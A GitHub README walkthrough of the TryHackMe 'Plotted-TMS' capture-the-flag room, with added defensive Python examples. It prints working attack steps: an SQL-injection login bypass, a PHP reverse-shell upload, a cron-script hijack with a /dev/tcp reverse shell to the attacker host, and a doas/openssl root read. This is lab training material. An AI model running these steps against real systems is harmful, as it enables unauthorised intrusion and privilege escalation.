https://github.com/bhattjayd/plotted-tms-ctf
- Host: GitHub
- URL: https://github.com/bhattjayd/plotted-tms-ctf
- Owner: BhattJayD
- Created: 2022-02-20T03:48:46.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2022-02-20T06:10:13.000Z (over 3 years ago)
- Last Synced: 2024-12-30T07:18:29.257Z (9 months ago)
- Size: 410 KB
- Stars: 0
- Watchers: 2
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# Plotted-TMS
A beginner-friendly CTF hosted on Tryhackme.com, created by "sa.infinity8888". The goal of this machine is boot to root: get the user flag and the root flag. The room covers enumeration, SQLi, and privilege escalation.
Let us boot up the machine and get the party started.
We start with an Nmap scan:
```
nmap -Pn -A -vvv -sV -sC -oN normal 10.10.255.29
```
which gives us the open ports:
```
PORT    STATE SERVICE REASON  VERSION
22/tcp  open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
445/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Let us start with a directory scan using gobuster:
```
gobuster -u http://10.10.255.29/ -w ~/Tools/SecLists/Discovery/Web-Content/common.txt
```
which gives us:
```
=====================================================
2022/02/20 09:33:06 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/index.html (Status: 200)
/passwd (Status: 200)
/server-status (Status: 403)
/shadow (Status: 200)
=====================================================
2022/02/20 09:35:05 Finished
=====================================================
```
The /admin directory contains an id_rsa file, which holds a base64 value. Decoding it gives `Trust me it is not this easy..now get back to enumeration :D`.
/passwd and /shadow also contain the same base64 value, and the result is
`not this easy :D`
So not much was found on port 80; let us enumerate port 445 with gobuster:
```
gobuster -u http://10.10.255.29:445/ -w ~/Tools/SecLists/Discovery/Web-Content/common.txt
```
which gives us:
```
=====================================================
2022/02/20 09:50:36 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/management (Status: 301)
/server-status (Status: 403)
=====================================================
2022/02/20 09:55:18 Finished
=====================================================
```
/management contains a login button which redirects to http://10.10.255.29:445/management/admin/login.php
Let us pass `admin` as the username and `admin` as the password; in response we get "Incorrect username or password".
So in the username field, pass `admin 'or 1=1-- -'` and any random password in the password field, then sign in. We are into the portal.
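The bypass above works because the login page splices the username straight into its SQL statement. As an added example (my code, not the room's PHP or anything from this writeup), here is a minimal login check in Python with sqlite3 in both forms: the concatenating version accepts the writeup's `admin 'or 1=1-- -` input because the quote closes the string and `--` comments out the password check, while the parameterised version binds the same input as a literal username and rejects it. The table, account name and password are constructed sample data.

```python
import sqlite3

# Constructed sample data. The password is stored in plaintext only to keep the
# demonstration short; a real application stores a password hash instead.
USERS = [("admin", "S3cret-admin-pw")]  # hypothetical account


def make_db() -> sqlite3.Connection:
    """Build an in-memory users table from the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", USERS)
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Login check that builds the SQL by string concatenation.

    This is the defect the writeup exploits: user input becomes part of the SQL
    grammar. Returns the matched username, or None when no row matches.
    """
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_hardened(conn: sqlite3.Connection, username: str, password: str):
    """Same check with bound parameters: the input is data, never SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "admin 'or 1=1-- -"  # the username submitted in the writeup
    print("vulnerable:", login_vulnerable(db, payload, "anything"))  # admin
    print("hardened:", login_hardened(db, payload, "anything"))  # None
    print("hardened, real credentials:", login_hardened(db, "admin", "S3cret-admin-pw"))
```

Running it shows the concatenated query collapsing to `WHERE username = 'admin ' or 1=1`, which matches every row, whereas the bound query looks for a user literally named `admin 'or 1=1-- -` and finds nothing.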
Next we will use the PHP reverse shell from
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
In this file we change the IP to our own IP
and start an nc listener:
`nc -nlvp`
On the admin portal, visit the Settings tab, replace the logo with our PHP reverse shell and update. With that, we get a reverse shell on our system:
```
nc -nlvp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.255.29 41970
Linux plotted 5.4.0-89-generic #100-Ubuntu SMP Fri Sep 24 14:50:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
04:48:07 up 56 min, 0 users, load average: 1.43, 1.24, 1.26
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
```
Now we will stabilise the shell:
```
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@plotted:/$ ^Z
[1]+ Stopped nc -nlvp 1234
splitunknown@SplitUnknown:~/Desktop/Plotted-TMS$ stty raw -echo;fg
splitunknown@SplitUnknown:~/Desktop/Plotted-TMS$ nc -nlvp 1234
www-data@plotted:/$
```
We don't have much access as www-data on the system, so let us enumerate to get to plot_admin for the user flag:
`cat /etc/crontab`
`* * * * * plot_admin /var/www/scripts/backup.sh`
The crontab contains a backup script that runs every minute as plot_admin, and we have write access to that folder. Remove backup.sh and
create a backup.sh on our system which contains:
```
#!/bin/bash
/bin/sh -i >& /dev/tcp/10.8.244.200/8888 0>&1
```
Start a Python web server:
`python3 -m http.server`
then wget backup.sh into the /var/www/scripts location:
`wget http://10.8.244.200:8000/backup.sh`
Give execute permission to backup.sh:
`chmod +x backup.sh`
Start a listener on our system:
`nc -nlvp 8888`
After one minute you should get the shell.
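The root cause of this step is a cron job that runs as plot_admin from a directory that a lower-privileged account can write to. The following added example (my code, not part of the writeup) is a small audit that parses system-crontab text, picks out the absolute paths in each job's command, and reports any script or containing directory that is group- or world-writable. The crontab text and the temporary backup.sh it examines are constructed to mirror the room's layout; nothing here touches the real /etc/crontab.

```python
import stat
import tempfile
from pathlib import Path

CRON_FIELDS = 5  # minute hour day-of-month month day-of-week


def parse_system_crontab(text: str):
    """Yield (user, command) pairs from /etc/crontab-style text.

    The system crontab carries a user column after the five time fields.
    Comments, blank lines and VAR=value assignments are skipped, and the
    @reboot/@hourly shorthands (one schedule token) are handled.
    """
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        head = line.split(None, 1)[0]
        if "=" in head:  # environment assignment such as PATH=/usr/bin
            continue
        if head.startswith("@"):
            parts, needed = line.split(None, 2), 3
        else:
            parts, needed = line.split(None, CRON_FIELDS + 1), CRON_FIELDS + 2
        if len(parts) < needed:
            continue  # malformed line; a stricter tool would report it
        yield parts[-2], parts[-1]


def writable_by_others(path: Path) -> bool:
    """True if the group- or world-writable bit is set on the path."""
    return bool(path.stat().st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_crontab(text: str) -> list:
    """Return (user, path, reason) findings for cron commands whose script or
    containing directory can be modified by accounts other than the owner."""
    findings = []
    for user, command in parse_system_crontab(text):
        for token in command.split():
            if not token.startswith("/"):
                continue
            p = Path(token)
            if not p.exists():
                continue
            for target, what in ((p, "script"), (p.parent, "directory")):
                if writable_by_others(target):
                    findings.append(
                        (user, token, f"{what} {target} is group/world-writable")
                    )
    return findings


def demo() -> list:
    """Constructed scenario: backup.sh runs every minute as plot_admin from a
    directory that other users can write to, as in the room."""
    root = Path(tempfile.mkdtemp())
    scripts = root / "scripts"
    scripts.mkdir()
    script = scripts / "backup.sh"
    script.write_text("#!/bin/bash\necho backup\n")
    script.chmod(0o755)  # the script's own mode is fine...
    scripts.chmod(0o777)  # ...but its directory lets anyone replace it
    crontab = f"""\
# constructed /etc/crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root run-parts --report /etc/cron.hourly
* * * * * plot_admin {script}
"""
    return audit_crontab(crontab)


if __name__ == "__main__":
    for user, path, reason in demo():
        print(f"[!] job for {user}: {path}: {reason}")
```

The directory check matters more than the script check: a script with a tight mode still gets replaced when its parent directory is writable, which is exactly what the writeup does by deleting backup.sh and fetching a new one.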


Stabilise the shell:
```
$ python3 -c "import pty;pty.spawn('/bin/bash')"
plot_admin@plotted:~$ ^Z
[1]+ Stopped nc -nlvp 8888
splitunknown@SplitUnknown:~/Desktop/Plotted-TMS$ stty raw -echo;fg
nc -nlvp 8888
```
Grab the user flag:
`cat ~/user.txt`
Let us move on to privilege escalation. Run this
`find / -type f -perm /4000 -ls 2>/dev/null`
to list the SUID binaries.
We find /usr/bin/doas, an unusual SUID binary.
```
plot_admin@plotted:~$ cat /etc/doas.conf
permit nopass plot_admin as root cmd openssl
```
We can run openssl as root through doas without a password.
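To audit a doas.conf for rules like the one above, the following added example (my code, not from the writeup or the doas project) parses the rule grammar documented in doas.conf(5) and reports every permit rule that reaches root with nopass. A rule without an `as` clause is reported too, since doas then allows any target user and root is the default. The sample configuration is constructed; its plot_admin line is the one from the room.

```python
import shlex

OPTION_WORDS = {"nopass", "nolog", "persist", "keepenv"}

# Constructed doas.conf for the demonstration; only the plot_admin line is from the room.
SAMPLE_CONF = """\
# constructed doas.conf
permit persist :wheel
permit nopass keepenv setenv { PATH=/usr/bin } alice as root cmd /usr/bin/apt args update
permit nopass bob as bob cmd /bin/ls
permit nopass plot_admin as root cmd openssl
deny carol
"""


def parse_doas_conf(text: str) -> list:
    """Parse doas.conf text into rule dicts.

    Grammar: permit|deny [options] identity [as target] [cmd command [args ...]]
    Options are nopass, nolog, persist, keepenv and setenv { VAR=value ... }.
    """
    rules = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        toks = shlex.split(raw, comments=True)
        if not toks:
            continue
        if toks[0] not in ("permit", "deny"):
            raise ValueError(f"line {lineno}: expected permit or deny, got {toks[0]!r}")
        rule = {"line": lineno, "action": toks[0], "options": set(), "setenv": [],
                "identity": None, "target": None, "cmd": None, "args": None}

        def take(i: int) -> str:  # token at i, or a clear error on a truncated rule
            if i >= len(toks):
                raise ValueError(f"line {lineno}: unexpected end of rule")
            return toks[i]

        i = 1
        while i < len(toks) and (toks[i] in OPTION_WORDS or toks[i] == "setenv"):
            if toks[i] == "setenv":
                if take(i + 1) != "{":
                    raise ValueError(f"line {lineno}: setenv needs {{ ... }}")
                i += 2
                while take(i) != "}":
                    rule["setenv"].append(toks[i])
                    i += 1
                i += 1
            else:
                rule["options"].add(toks[i])
                i += 1
        rule["identity"] = take(i)
        i += 1
        if i < len(toks) and toks[i] == "as":
            rule["target"] = take(i + 1)
            i += 2
        if i < len(toks) and toks[i] == "cmd":
            rule["cmd"] = take(i + 1)
            i += 2
            if i < len(toks) and toks[i] == "args":
                rule["args"] = toks[i + 1:]  # [] means "no arguments allowed"
                i = len(toks)
        if i != len(toks):
            raise ValueError(f"line {lineno}: unexpected tokens {toks[i:]}")
        rules.append(rule)
    return rules


def audit_doas(rules: list) -> list:
    """Report permit rules that grant root without a password. doas applies the
    last matching rule, so every candidate line is listed for the reviewer."""
    findings = []
    for r in rules:
        if r["action"] != "permit" or "nopass" not in r["options"]:
            continue
        if r["target"] not in (None, "root"):  # no "as" clause: any target, root included
            continue
        if r["cmd"] is None:
            what = "any command"
        elif r["args"] is None:
            what = f"{r['cmd']} (any arguments)"
        elif not r["args"]:
            what = f"{r['cmd']} (no arguments)"
        else:
            what = f"{r['cmd']} {' '.join(r['args'])}"
        findings.append(f"line {r['line']}: {r['identity']} may run {what} as root without a password")
    return findings


def demo() -> list:
    return audit_doas(parse_doas_conf(SAMPLE_CONF))


if __name__ == "__main__":
    for finding in demo():
        print("[!]", finding)
```

A rule that names a command but no `args` clause, as the room's openssl line does, leaves every argument to the caller, which is why the audit spells out "(any arguments)"; restricting `args` or requiring a password are the two knobs the file offers.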
```
plot_admin@plotted:~$ file=/root/root.txt
plot_admin@plotted:~$ doas openssl enc -in "$file"
Congratulations on completing this room!Hope you enjoyed the journey!
Do let me know if you have any ideas/suggestions for future rooms.
-sa.infinity8888
plot_admin@plotted:~$
```
I hope this walk-through was helpful. Thank you so much for reading it.
Happy Hacking ❤